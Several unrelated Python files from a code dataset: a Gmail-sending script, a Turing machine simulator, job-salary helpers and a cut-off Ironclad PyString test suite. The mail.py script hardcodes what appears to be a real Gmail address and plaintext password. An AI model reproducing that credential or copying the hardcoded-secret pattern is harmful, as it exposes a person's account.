\r\n\r\n","repo_name":"ElMoha943/PackagingMachine","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2882054246","text":"import smtplib\r\nfrom email.mime.text import *\r\nbody='''hi re this is laharika i am sending this mail from my python program'''\r\nmsg=MIMEText(body)\r\nmsg['from']=\"luckyneelam97@gmail.com\"\r\nmsg['to']=\"143sarvani@gmail.com\"\r\nmsg['subject']=\"hi sarru\"\r\nserver=smtplib.SMTP('smtp.gmail.com',587)\r\nserver.starttls()\r\nserver.login(\"luckyneelam97@gmail.com\",\"143momanddad\")\r\nserver.send_message(msg)\r\nprint(\"message sent....\")\r\nserver.quit()","repo_name":"laharikaneelam/Python_exercises","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32333419781","text":"class MaquinaTuring:\n def __init__(self, estados, alfabeto, branco, estado_inicial, estado_aceitacao, estado_rejeicao, transicoes):\n self.estados = estados\n self.alfabeto = alfabeto\n self.branco = branco\n self.estado_inicial = estado_inicial\n self.estado_aceitacao = estado_aceitacao\n self.estado_rejeicao = estado_rejeicao\n self.transicoes = transicoes\n self.fitat = [branco]\n self.cabeca = 0\n self.estado_atual = estado_inicial\n\n def executar(self, entrada):\n self.fitat = [self.branco] + list(entrada) + [self.branco]\n self.cabeca = 1\n self.estado_atual = self.estado_inicial\n\n while self.estado_atual != self.estado_aceitacao and self.estado_atual != self.estado_rejeicao:\n simbolo_atual = self.fitat[self.cabeca]\n if (self.estado_atual, simbolo_atual) not in self.transicoes:\n break\n proximo_estado, simbolo_escrito, direcao_movimento = self.transicoes[(self.estado_atual, simbolo_atual)]\n self.fitat[self.cabeca] = simbolo_escrito\n if direcao_movimento == 'L':\n self.cabeca -= 1\n elif direcao_movimento == 'R':\n self.cabeca += 1\n self.estado_atual = proximo_estado\n\n return self.estado_atual == self.estado_aceitacao\n\n# Definindo estados, símbolos e funções de transição\nestados = {'q0', 'q1', 'q2', 'q3', 'q4'}\nalfabeto = {'0', '1', '#', 'X', '_'}\nbranco = '_'\nestado_inicial = 'q0'\nestado_aceitacao = 'q3'\nestado_rejeicao = 'q4'\ntransicoes = {\n ('q0', '0'): ('q1', 'X', 'R'),\n ('q0', '1'): ('q1', 'X', 'R'),\n ('q0', '#'): ('q2', '#', 'L'),\n ('q1', '0'): ('q1', '0', 'R'),\n ('q1', '1'): ('q1', '1', 'R'),\n ('q1', '#'): ('q2', '#', 'L'),\n ('q2', '#'): ('q3', '#', 'L'),\n ('q1', '_'): ('q4', '_', 'L'),\n ('q2', '_'): ('q4', '_', 'L'),\n ('q0', '_'): ('q3', '_', 'L')\n}\n\n# Criar uma instância da Máquina de Turing\nmt = MaquinaTuring(estados, alfabeto, branco, estado_inicial, estado_aceitacao, estado_rejeicao, transicoes)\n\n# Solicitar entrada ao usuário\nentrada = input(\"Digite a string para verificar se está na linguagem: \")\n\n# Executar a Máquina de Turing na entrada fornecida\nresultado = mt.executar(entrada)\n\n# Exibir o resultado\nif resultado:\n print(\"A entrada está na linguagem.\")\nelse:\n print(\"A entrada não está na linguagem.\")\n","repo_name":"Rayan-1/MTteoria","sub_path":"mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21110193712","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef 
get_max_salary(path: str) -> int:\n data_list = read(path)\n all_jobs_max_salaries = []\n all_exceptions = []\n for data in data_list:\n try:\n max_salary = int(data[\"max_salary\"])\n except ValueError:\n all_exceptions.append(data[\"max_salary\"])\n else:\n all_jobs_max_salaries.append(max_salary)\n\n result = max(all_jobs_max_salaries)\n print(set(all_exceptions))\n return result\n\n\ndef get_min_salary(path: str) -> int:\n data_list = read(path)\n all_jobs_min_salaries = []\n all_exceptions = []\n for data in data_list:\n try:\n min_salary = int(data[\"min_salary\"])\n except ValueError:\n all_exceptions.append(data[\"min_salary\"])\n else:\n all_jobs_min_salaries.append(min_salary)\n\n result = min(all_jobs_min_salaries)\n print(set(all_exceptions))\n return result\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n result = False\n try:\n min_salary = int(job[\"min_salary\"])\n max_salary = int(job[\"max_salary\"])\n salary_search = int(salary)\n max(min_salary, max_salary, salary_search)\n if (min_salary > max_salary):\n raise Exception\n except Exception:\n raise ValueError\n else:\n if (min_salary <= salary_search <= max_salary):\n result = True\n else:\n result = False\n return result\n\n\ndef filter_by_salary_range(\n jobs: List[dict],\n salary: Union[str, int]\n) -> List[Dict]:\n all_jobs_in_salary_range = []\n all_exceptions = []\n for job in jobs:\n try:\n is_in_salary_range = matches_salary_range(job, salary)\n except ValueError:\n all_exceptions.append([job, salary])\n else:\n if (is_in_salary_range):\n all_jobs_in_salary_range.append(job)\n print(all_exceptions)\n return all_jobs_in_salary_range\n","repo_name":"moisesfdasilva/app-job-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71398118613","text":"\nfrom tests.utils.runtest import automakesuite, run\n\nfrom tests.utils.allocators import GetAllocatingTestAllocator\nfrom tests.utils.memory import OffsetPtr, CreateTypes, PtrToStructure\nfrom tests.utils.testcase import TestCase, WithMapper\nfrom tests.utils.typetestcase import TypeTestCase\n\nfrom System import Array, Byte, Char, IntPtr, Type, UInt32\nfrom System.Runtime.InteropServices import Marshal\nfrom Ironclad import CPyMarshal, dgt_int_ptrintptr, dgt_int_ptrptr, dgt_ptr_ptrptr, PythonMapper\nfrom Ironclad.Structs import PyStringObject, PyTypeObject, PyBufferProcs, PySequenceMethods, Py_TPFLAGS\n\n\nclass PyString_TestCase(TestCase):\n\n def byteArrayFromString(self, testString):\n testLength = len(testString)\n chars = testString.ToCharArray()\n return Array.ConvertAll[Char, Byte](chars, lambda c: ord(c))\n\n\n def ptrFromByteArray(self, bytes):\n testData = Marshal.AllocHGlobal(bytes.Length + 1)\n Marshal.Copy(bytes, 0, testData, bytes.Length)\n Marshal.WriteByte(OffsetPtr(testData, bytes.Length), 0)\n return testData\n\n\n def dataPtrFromStrPtr(self, strPtr):\n return OffsetPtr(strPtr, Marshal.OffsetOf(PyStringObject, \"ob_sval\"))\n\n\n def fillStringDataWithBytes(self, strPtr, bytes):\n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n Marshal.Copy(bytes, 0, strDataPtr, len(bytes))\n\n\n def getStringWithValues(self, start, pastEnd):\n return \"\".join(chr(c) for c in range(start, pastEnd))\n\n\n def assertHasStringType(self, ptr, mapper):\n self.assertEquals(CPyMarshal.ReadPtrField(ptr, PyStringObject, \"ob_type\"), mapper.PyString_Type, \"bad type\")\n\n\n def 
assertStringObjectHasLength(self, strPtr, length):\n stringObject = PtrToStructure(strPtr, PyStringObject)\n self.assertEquals(stringObject.ob_refcnt, 1, \"unexpected refcount\")\n self.assertEquals(stringObject.ob_size, length, \"unexpected ob_size\")\n self.assertEquals(stringObject.ob_shash, -1, \"unexpected currently-useless-field\")\n self.assertEquals(stringObject.ob_sstate, 0, \"unexpected currently-useless-field\")\n \n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n terminatorPtr = OffsetPtr(strDataPtr, length)\n self.assertEquals(Marshal.ReadByte(terminatorPtr), 0, \"string not terminated\")\n\n\n def assertStringObjectHasDataBytes(self, strPtr, expectedBytes):\n strDataPtr = self.dataPtrFromStrPtr(strPtr)\n testLength = len(expectedBytes)\n writtenBytes = Array.CreateInstance(Byte, testLength)\n Marshal.Copy(strDataPtr, writtenBytes, 0, testLength)\n\n self.assertEquals(len(writtenBytes), testLength, \"copied wrong\")\n for (actual, expected) in zip(writtenBytes, expectedBytes):\n self.assertEquals(actual, expected, \"failed to copy string data correctly\")\n\n\nclass PyString_Type_Test(TypeTestCase):\n \n def testString_tp_free(self):\n self.assertUsual_tp_free(\"PyString_Type\")\n \n def testString_tp_dealloc(self):\n self.assertUsual_tp_dealloc(\"PyString_Type\")\n\n\n @WithMapper\n def testFlags(self, mapper, _):\n flags = CPyMarshal.ReadUIntField(mapper.PyString_Type, PyTypeObject, \"tp_flags\")\n self.assertEquals(flags & UInt32(Py_TPFLAGS.HAVE_GETCHARBUFFER), UInt32(Py_TPFLAGS.HAVE_GETCHARBUFFER))\n \n\n @WithMapper\n def testSizes(self, mapper, _):\n tp_basicsize = CPyMarshal.ReadIntField(mapper.PyString_Type, PyTypeObject, 'tp_basicsize')\n self.assertNotEquals(tp_basicsize, 0)\n tp_itemsize = CPyMarshal.ReadIntField(mapper.PyString_Type, PyTypeObject, 'tp_itemsize')\n self.assertNotEquals(tp_itemsize, 0)\n\n\n @WithMapper\n def testStringifiers(self, mapper, _):\n IC_PyString_Str = mapper.GetFuncPtr(\"IC_PyString_Str\")\n tp_str = CPyMarshal.ReadPtrField(mapper.PyString_Type, PyTypeObject, \"tp_str\")\n self.assertEquals(tp_str, IC_PyString_Str)\n \n PyObject_Repr = mapper.GetFuncPtr(\"PyObject_Repr\")\n tp_repr = CPyMarshal.ReadPtrField(mapper.PyString_Type, PyTypeObject, \"tp_repr\")\n self.assertEquals(tp_repr, PyObject_Repr)\n\n\n @WithMapper\n def testSequenceProtocol(self, mapper, _):\n strPtr = mapper.PyString_Type\n \n seqPtr = CPyMarshal.ReadPtrField(strPtr, PyTypeObject, 'tp_as_sequence')\n self.assertNotEquals(seqPtr, IntPtr.Zero)\n concatPtr = CPyMarshal.ReadPtrField(seqPtr, PySequenceMethods, 'sq_concat')\n # concat_core tested further down\n self.assertEquals(concatPtr, mapper.GetFuncPtr('IC_PyString_Concat_Core'))\n \n \n @WithMapper\n def testBufferProtocol(self, mapper, later):\n # should all be implemented in C really, but weaving cpy string type into\n # our code feels too much like hard work for now\n strPtr = mapper.PyString_Type\n \n bufPtr = CPyMarshal.ReadPtrField(strPtr, PyTypeObject, 'tp_as_buffer')\n self.assertNotEquals(bufPtr, IntPtr.Zero)\n getreadbuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getreadbuffer', dgt_int_ptrintptr)\n getwritebuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getwritebuffer', dgt_int_ptrintptr)\n getcharbuffer = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getcharbuffer', dgt_int_ptrintptr)\n getsegcount = CPyMarshal.ReadFunctionPtrField(bufPtr, PyBufferProcs, 'bf_getsegcount', dgt_int_ptrptr)\n \n ptrptr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n 
later(lambda: Marshal.FreeHGlobal(ptrptr))\n \n strptr = mapper.Store(\"hullo\")\n for getter in (getreadbuffer, getcharbuffer):\n self.assertEquals(getter(strptr, 0, ptrptr), 5)\n self.assertEquals(CPyMarshal.ReadPtr(ptrptr), CPyMarshal.GetField(strptr, PyStringObject, 'ob_sval'))\n self.assertEquals(getter(strptr, 1, ptrptr), -1)\n self.assertMapperHasError(mapper, SystemError)\n \n self.assertEquals(getwritebuffer(strptr, 0, ptrptr), -1)\n self.assertMapperHasError(mapper, SystemError)\n \n self.assertEquals(getsegcount(strptr, ptrptr), 1)\n self.assertEquals(CPyMarshal.ReadInt(ptrptr), 5)\n self.assertEquals(getsegcount(strptr, IntPtr.Zero), 1)\n\n\nclass PyString_FromString_Test(PyString_TestCase):\n\n def testCreatesString(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n testString = \"beset on all sides\" + self.getStringWithValues(1, 256)\n bytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(bytes)\n try:\n strPtr = mapper.PyString_FromString(testData)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, len(bytes) + baseSize)], \"allocated wrong\")\n self.assertStringObjectHasLength(strPtr, len(bytes))\n self.assertStringObjectHasDataBytes(strPtr, bytes)\n self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to map pointer correctly\")\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(testData)\n deallocTypes()\n\n\nclass PyString_Concat_Test(PyString_TestCase):\n\n @WithMapper\n def testBasic(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n part2Ptr = mapper.Store(\" three\")\n startingRefCnt = mapper.RefCount(part1Ptr)\n \n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, None)\n \n\n newStringPtr = Marshal.ReadIntPtr(stringPtrPtr)\n self.assertEquals(mapper.Retrieve(newStringPtr), \"one two three\")\n\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\n @WithMapper\n def testErrorCaseSecondArg(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingRefCnt = mapper.RefCount(part1Ptr)\n \n part2Ptr = mapper.Store(3)\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, TypeError)\n\n self.assertEquals(Marshal.ReadIntPtr(stringPtrPtr), IntPtr(0))\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\n @WithMapper\n def testErrorCaseSecondArg(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(17)\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingRefCnt = mapper.RefCount(part1Ptr)\n\n part2Ptr = mapper.Store(\"three\")\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_Concat(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, TypeError)\n\n self.assertEquals(Marshal.ReadIntPtr(stringPtrPtr), IntPtr(0))\n self.assertEquals(startingRefCnt - mapper.RefCount(part1Ptr), 1)\n\n\nclass 
PyString_ConcatAndDel_Test(PyString_TestCase):\n\n @WithMapper\n def testBasic(self, mapper, addToCleanup):\n part1Ptr = mapper.Store(\"one two\")\n mapper.IncRef(part1Ptr) # avoid garbage collection\n startingPart1RefCnt = mapper.RefCount(part1Ptr)\n \n part2Ptr = mapper.Store(\" three\")\n mapper.IncRef(part2Ptr) # avoid garbage collection\n startingPart2RefCnt = mapper.RefCount(part2Ptr)\n\n stringPtrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n addToCleanup(lambda: Marshal.FreeHGlobal(stringPtrPtr))\n \n Marshal.WriteIntPtr(stringPtrPtr, part1Ptr)\n mapper.PyString_ConcatAndDel(stringPtrPtr, part2Ptr)\n self.assertMapperHasError(mapper, None)\n\n newStringPtr = Marshal.ReadIntPtr(stringPtrPtr)\n self.assertEquals(mapper.Retrieve(newStringPtr), \"one two three\")\n\n self.assertEquals(startingPart1RefCnt - mapper.RefCount(part1Ptr), 1)\n self.assertEquals(startingPart2RefCnt - mapper.RefCount(part2Ptr), 1)\n \n\n\nclass InternTest(PyString_TestCase):\n \n @WithMapper\n def testInternExisting(self, mapper, addToCleanUp):\n testString = \"mars needs women\" + self.getStringWithValues(1, 256)\n bytes = self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(bytes)\n \n sp1 = mapper.PyString_FromString(testData)\n addToCleanUp(lambda: Marshal.FreeHGlobal(sp1p))\n\n sp2 = mapper.PyString_InternFromString(testData)\n addToCleanUp(lambda: Marshal.FreeHGlobal(testData))\n\n self.assertNotEquals(sp1, sp2)\n self.assertFalse(mapper.Retrieve(sp1) is mapper.Retrieve(sp2))\n self.assertEquals(mapper.RefCount(sp1), 1)\n self.assertEquals(mapper.RefCount(sp2), 2, 'failed to grab extra reference to induce immortality')\n \n mapper.IncRef(sp1)\n sp1p = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n CPyMarshal.WritePtr(sp1p, sp1)\n mapper.PyString_InternInPlace(sp1p)\n sp1i = CPyMarshal.ReadPtr(sp1p)\n self.assertEquals(sp1i, sp2, 'failed to intern')\n self.assertTrue(mapper.Retrieve(sp1i) is mapper.Retrieve(sp2))\n self.assertEquals(mapper.RefCount(sp1), 1, 'failed to decref old string')\n self.assertEquals(mapper.RefCount(sp2), 3, 'failed to incref interned string')\n\n\n\nclass PyString_FromStringAndSize_Test(PyString_TestCase):\n\n def testCreateEmptyString(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n try:\n testString = \"we run the grease racket in this town\" + self.getStringWithValues(0, 256)\n testLength = len(testString)\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, testLength)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n self.assertStringObjectHasLength(strPtr, testLength)\n self.assertHasStringType(strPtr, mapper)\n testBytes = self.byteArrayFromString(testString)\n self.fillStringDataWithBytes(strPtr, testBytes)\n\n resultStr = mapper.Retrieve(strPtr)\n self.assertEquals(resultStr, testString, \"failed to read string data\")\n \n strPtr2 = mapper.Store(resultStr)\n self.assertEquals(strPtr2, strPtr, \"did not remember already had this string\")\n self.assertEquals(mapper.RefCount(strPtr), 2, \"did not incref on store\")\n finally:\n mapper.Dispose()\n deallocTypes()\n\n\n def testCreateStringWithData(self):\n allocs = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n try:\n testString = \"we also run the shovel racket\" + self.getStringWithValues(0, 256)\n testBytes = 
self.byteArrayFromString(testString)\n testData = self.ptrFromByteArray(testBytes)\n testLength = len(testString)\n\n strPtr = mapper.PyString_FromStringAndSize(testData, testLength)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n self.assertHasStringType(strPtr, mapper)\n self.assertStringObjectHasLength(strPtr, testLength)\n self.assertStringObjectHasDataBytes(strPtr, testBytes)\n self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to read string data\")\n finally:\n mapper.Dispose()\n deallocTypes()\n\n\nclass _PyString_Resize_Test(PyString_TestCase):\n\n def testErrorHandling(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n\n try:\n data = mapper.PyString_FromStringAndSize(IntPtr.Zero, 365)\n Marshal.WriteIntPtr(ptrPtr, data)\n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(data, 365 + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, 2000000000), -1, \"bad return on error\")\n self.assertEquals(type(mapper.LastException), MemoryError, \"wrong exception type\")\n self.assertTrue(data in frees, \"did not deallocate\") \n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n\n\n def testShrink(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n oldLength = 365\n newLength = 20\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n\n try:\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, oldLength)\n Marshal.WriteIntPtr(ptrPtr, strPtr)\n \n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(strPtr, oldLength + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, newLength), 0, \"bad return on success\")\n \n self.assertHasStringType(strPtr, mapper)\n self.assertStringObjectHasLength(strPtr, newLength)\n\n self.assertEquals(allocs, [(strPtr, oldLength + baseSize)], \"unexpected extra alloc\")\n self.assertEquals(frees, [], \"unexpected frees\")\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n\n\n def testGrow(self):\n allocs = []\n frees = []\n mapper = PythonMapper(GetAllocatingTestAllocator(allocs, frees))\n deallocTypes = CreateTypes(mapper)\n del allocs[:]\n\n oldLength = 20\n testString = \"slings and arrows\" + self.getStringWithValues(0, 256)\n newLength = len(testString)\n\n oldStrPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, oldLength)\n ptrPtr = Marshal.AllocHGlobal(Marshal.SizeOf(IntPtr()))\n \n try:\n Marshal.WriteIntPtr(ptrPtr, oldStrPtr)\n newStrPtr = IntPtr.Zero\n \n baseSize = Marshal.SizeOf(PyStringObject())\n self.assertEquals(allocs, [(oldStrPtr, oldLength + baseSize)], \"allocated wrong\")\n self.assertEquals(mapper._PyString_Resize(ptrPtr, newLength), 0, \"bad return on success\")\n\n newStrPtr = Marshal.ReadIntPtr(ptrPtr)\n expectedAllocs = [(oldStrPtr, oldLength + baseSize), (newStrPtr, newLength + baseSize)]\n self.assertEquals(allocs, expectedAllocs,\n \"allocated wrong\")\n self.assertEquals(frees, [oldStrPtr], \"did not free unused memory\")\n\n self.assertHasStringType(newStrPtr, mapper)\n self.assertStringObjectHasLength(newStrPtr, newLength)\n\n testBytes = self.byteArrayFromString(testString)\n 
self.fillStringDataWithBytes(newStrPtr, testBytes)\n\n self.assertEquals(mapper.Retrieve(newStrPtr), testString, \"failed to read string data\")\n if oldStrPtr != newStrPtr:\n # this would otherwise fail (very, very rarely)\n self.assertEquals(oldStrPtr in frees, True)\n finally:\n mapper.Dispose()\n Marshal.FreeHGlobal(ptrPtr)\n deallocTypes()\n \n\nclass PyString_Size_Test(PyString_TestCase):\n \n @WithMapper\n def testWorks(self, mapper, _):\n testString = \"Oh, sure, Lisa -- some wonderful, magical animal.\" + self.getStringWithValues(0, 256)\n testLength = len(testString)\n \n strPtr = mapper.Store(testString)\n self.assertEquals(mapper.PyString_Size(strPtr), testLength)\n\n\nclass PyString_OtherMethodsTest(TestCase):\n \n @WithMapper\n def testStringifiers(self, mapper, _):\n src = 'foo \\0 bar \" \\' \" \\' supercalifragilisticexpialidocious'\n srcPtr = mapper.Store(src)\n \n str_ = mapper.Retrieve(mapper.IC_PyString_Str(srcPtr))\n self.assertEquals(str_, src)\n self.assertEquals(mapper.IC_PyString_Str(mapper.Store(object())), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n \n for smartquotes in (0, 1):\n # smartquotes is ignored for now\n repr_ = mapper.Retrieve(mapper.PyString_Repr(srcPtr, smartquotes))\n self.assertEquals(repr_, repr(src))\n self.assertEquals(mapper.PyString_Repr(mapper.Store(object()), smartquotes), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n \n @WithMapper\n def testConcat(self, mapper, _):\n strs = ('', 'abc', '\\0xo')\n for s1 in strs:\n for s2 in strs:\n s3ptr = mapper.IC_PyString_Concat_Core(mapper.Store(s1), mapper.Store(s2))\n self.assertEquals(mapper.Retrieve(s3ptr), s1 + s2)\n\n\nclass PyString_AsStringTest(PyString_TestCase):\n \n @WithMapper\n def testWorks(self, mapper, _):\n strPtr = mapper.Store(\"You're fighting a business hippy. 
This is a hippy that understands the law of supply and demand.\")\n strData = CPyMarshal.Offset(strPtr, Marshal.OffsetOf(PyStringObject, 'ob_sval'))\n self.assertEquals(mapper.PyString_AsString(strPtr), self.dataPtrFromStrPtr(strPtr))\n \n notstrPtr = mapper.Store(object())\n self.assertEquals(mapper.PyString_AsString(notstrPtr), IntPtr.Zero)\n self.assertMapperHasError(mapper, TypeError)\n\n\n @WithMapper\n def testDoesNotActualiseString(self, mapper, _):\n testString = \"She's the oldest planet-cracker in existence\"\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, len(testString))\n \n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(\"blah blah nonsense blah\"))\n mapper.PyString_AsString(strPtr) # this should NOT bake the string data\n self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(testString))\n \n self.assertEquals(mapper.Retrieve(strPtr), testString)\n\n\nclass PyString_AsStringAndSizeTest(PyString_TestCase):\n \n @WithMapper\n def testWorksWithEmbeddedNulls(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testStr = \"You're fighting a saber-toothed ferret.\" + self.getStringWithValues(0, 256)\n strPtr = mapper.Store(testStr)\n dataPtr = self.dataPtrFromStrPtr(strPtr)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertEquals(CPyMarshal.ReadInt(sizePtr), len(testStr))\n self.assertMapperHasError(mapper, None)\n \n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, IntPtr.Zero), -1)\n self.assertMapperHasError(mapper, TypeError)\n \n \n @WithMapper\n def testWorksWithoutEmbeddedNulls(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testStr = \"You're fighting Ed the Undying.\" + self.getStringWithValues(1, 256)\n strPtr = mapper.Store(testStr)\n dataPtr = self.dataPtrFromStrPtr(strPtr)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertEquals(CPyMarshal.ReadInt(sizePtr), len(testStr))\n self.assertMapperHasError(mapper, None)\n \n CPyMarshal.Zero(dataPtrPtr, CPyMarshal.PtrSize * 2)\n self.assertEquals(mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, IntPtr.Zero), 0)\n self.assertEquals(CPyMarshal.ReadPtr(dataPtrPtr), dataPtr)\n self.assertMapperHasError(mapper, None)\n\n \n @WithMapper\n def testWorksWithNonString(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n self.assertEquals(mapper.PyString_AsStringAndSize(mapper.Store(object()), dataPtrPtr, sizePtr), -1)\n self.assertMapperHasError(mapper, TypeError)\n\n\n @WithMapper\n def testDoesNotActualiseString(self, mapper, addDealloc):\n dataPtrPtr = Marshal.AllocHGlobal(CPyMarshal.PtrSize * 2)\n sizePtr = CPyMarshal.Offset(dataPtrPtr, CPyMarshal.PtrSize)\n addDealloc(lambda: Marshal.FreeHGlobal(dataPtrPtr))\n \n testString = \"You find a frozen Mob Penguin.\"\n strPtr = mapper.PyString_FromStringAndSize(IntPtr.Zero, len(testString))\n \n self.fillStringDataWithBytes(strPtr, 
self.byteArrayFromString(\"blah blah nonsense\"))\n        mapper.PyString_AsStringAndSize(strPtr, dataPtrPtr, sizePtr) # this should NOT bake the string data\n        self.fillStringDataWithBytes(strPtr, self.byteArrayFromString(testString))\n        \n        self.assertEquals(mapper.Retrieve(strPtr), testString)\n    \n\nclass PyStringStoreTest(PyString_TestCase):\n    \n    def testStoreStringCreatesStringType(self):\n        allocs = []\n        mapper = PythonMapper(GetAllocatingTestAllocator(allocs, []))\n        deallocTypes = CreateTypes(mapper)\n        del allocs[:]\n\n        testString = \"fnord\" + self.getStringWithValues(1, 256)\n        testBytes = self.byteArrayFromString(testString)\n        testData = self.ptrFromByteArray(testBytes)\n        testLength = len(testString)\n\n        try:\n            strPtr = mapper.Store(testString)\n            baseSize = Marshal.SizeOf(PyStringObject())\n            \n            self.assertEquals(allocs, [(strPtr, testLength + baseSize)], \"allocated wrong\")\n            self.assertHasStringType(strPtr, mapper)\n            self.assertStringObjectHasLength(strPtr, testLength)\n            self.assertStringObjectHasDataBytes(strPtr, testBytes)\n            self.assertEquals(mapper.Retrieve(strPtr), testString, \"failed to read string data\")\n            \n            strPtr2 = mapper.Store(testString)\n            self.assertEquals(strPtr2, strPtr, \"did not remember already had this string\")\n            self.assertEquals(mapper.RefCount(strPtr), 2, \"did not incref on store\")\n        finally:\n            mapper.Dispose()\n            deallocTypes()\n\nsuite = automakesuite(locals())\n\nif __name__ == '__main__':\n    